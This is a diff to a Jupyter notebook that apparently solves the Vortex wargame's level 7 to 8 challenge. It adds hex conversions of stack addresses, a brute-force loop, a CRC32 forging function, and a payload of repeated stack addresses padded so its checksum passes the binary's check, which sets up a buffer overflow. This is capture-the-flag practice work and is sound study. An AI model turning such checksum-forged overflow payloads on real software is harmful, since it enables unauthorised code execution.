--- a/Vortex/vortex.ipynb
+++ b/Vortex/vortex.ipynb
@@ -133,6 +133,263 @@
     "    + b\"A\" * 98\n",
     ")"
    ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "4294957897"
+      ]
+     },
+     "execution_count": 1,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "0xFFFFDB49"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "623800357"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "0x252E7025"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "4157313110"
+      ]
+     },
+     "execution_count": 6,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "0xF7CB9056"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "4222783574"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "0xFBB29056"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "-9398"
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "0xDB49 - 0xFFFF"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Vortex Level 7 → Level 8\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 38,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "import binascii\n",
+    "import struct\n",
+    "\n",
+    "for i in range(2 ^ 256 ^ 256 ^ 256 ^ 256):\n",
+    "    argv = b\"a\" * 58 + i.to_bytes(4, \"big\") + struct.pack(\"<I\", 0xFFFFD9FB)\n",
+    "    # print(f\"argv = {argv}\")\n",
+    "    hi = hex(binascii.crc32(argv, 0xFFFFFFFF) ^ 0xFFFFFFFF)\n",
+    "    # print(f\"hi = {hi}\")\n",
+    "\n",
+    "    hex_check = \"0xe1ca95ee\"\n",
+    "    # print(f\"hex_check = {hex_check}\")\n",
+    "    if hi == hex_check:\n",
+    "        print(\"Match found!\")\n",
+    "        print(f\"argv = {argv}\")\n",
+    "        break"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 100,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "#!/usr/bin/env python\n",
+    "from struct import pack\n",
+    "import binascii\n",
+    "\n",
+    "# Poly in \"reversed\" notation -- http://en.wikipedia.org/wiki/Cyclic_redundancy_check\n",
+    "POLY = 0xEDB88320  # CRC-32-IEEE 802.3\n",
+    "# POLY = 0x82F63B78 # CRC-32C (Castagnoli)\n",
+    "# POLY = 0xEB31D82E # CRC-32K (Koopman)\n",
+    "# POLY = 0xD5828281 # CRC-32Q\n",
+    "\n",
+    "\n",
+    "def build_crc_tables():\n",
+    "    for i in range(256):\n",
+    "        fwd = i\n",
+    "        rev = i << 24\n",
+    "        for j in range(8, 0, -1):\n",
+    "            # build normal table\n",
+    "            if (fwd & 1) == 1:\n",
+    "                fwd = (fwd >> 1) ^ POLY\n",
+    "            else:\n",
+    "                fwd >>= 1\n",
+    "            crc32_table[i] = fwd & 0xFFFFFFFF\n",
+    "            # build reverse table =)\n",
+    "            if rev & 0x80000000 == 0x80000000:\n",
+    "                rev = ((rev ^ POLY) << 1) | 1\n",
+    "            else:\n",
+    "                rev <<= 1\n",
+    "            rev &= 0xFFFFFFFF\n",
+    "            crc32_reverse[i] = rev\n",
+    "\n",
+    "\n",
+    "crc32_table, crc32_reverse = [0] * 256, [0] * 256\n",
+    "build_crc_tables()\n",
+    "\n",
+    "seed = 0x0\n",
+    "\n",
+    "\n",
+    "def crc32(s):  # same crc32 as in (binascii.crc32)&0xffffffff\n",
+    "    crc = seed\n",
+    "    for c in s:\n",
+    "        crc = (crc >> 8) ^ crc32_table[(crc ^ c) & 0xFF]\n",
+    "    return crc ^ seed\n",
+    "\n",
+    "\n",
+    "def forge(wanted_crc, str, pos=None):\n",
+    "    if pos is None:\n",
+    "        pos = len(str)\n",
+    "\n",
+    "    # forward calculation of CRC up to pos, sets current forward CRC state\n",
+    "    fwd_crc = seed\n",
+    "    for c in str[:pos]:\n",
+    "        fwd_crc = (fwd_crc >> 8) ^ crc32_table[(fwd_crc ^ c) & 0xFF]\n",
+    "\n",
+    "    # backward calculation of CRC up to pos, sets wanted backward CRC state\n",
+    "    bkd_crc = wanted_crc ^ seed\n",
+    "    for c in str[pos:][::-1]:\n",
+    "        bkd_crc = ((bkd_crc << 8) & 0xFFFFFFFF) ^ crc32_reverse[bkd_crc >> 24] ^ c\n",
+    "\n",
+    "    # deduce the 4 bytes we need to insert\n",
+    "    for c in pack(\"<L\", fwd_crc)[::-1]:\n",
+    "        bkd_crc = ((bkd_crc << 8) & 0xFFFFFFFF) ^ crc32_reverse[bkd_crc >> 24] ^ c\n",
+    "\n",
+    "    res = str[:pos] + pack(\"<L\", bkd_crc) + str[pos:]\n",
+    "    assert binascii.crc32(res, 0xFFFFFFFF) ^ 0xFFFFFFFF == wanted_crc\n",
+    "    # assert crc32(res) == wanted_crc\n",
+    "    return res"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 119,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "hex(check) = 0xe1ca95ee\n",
+      "wanted_crc = 0xe1ca95ee\n",
+      "payload = b'=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff=\\xdd\\xff\\xff\\xfa\\x04\\xca\\xa6'\n"
+     ]
+    }
+   ],
+   "source": [
+    "wanted_crc = 0xE1CA95EE\n",
+    "\n",
+    "payload = forge(\n",
+    "    wanted_crc,\n",
+    "    b\"a\" * 0 + struct.pack(\"<I\", 0xFFFFDD3D) * 16,\n",
+    ")\n",
+    "\n",
+    "check = binascii.crc32(payload, 0xFFFFFFFF) ^ 0xFFFFFFFF\n",
+    "print(f\"hex(check) = {hex(check)}\")\n",
+    "print(f\"wanted_crc = {hex(wanted_crc)}\")\n",
+    "print(f\"payload = {payload}\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 67,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "'0xee4fe6c2'"
+      ]
+     },
+     "execution_count": 67,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "hex(\n",
+    "    crc32(\n",
+    "        b\"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\x01\\x01\\x01\\x01\\xfb\\xd9\\xff\\xff \\xed\\xba\\xee\"\n",
+    "    )\n",
+    ")"
+   ]
   }
  ],
  "metadata": {
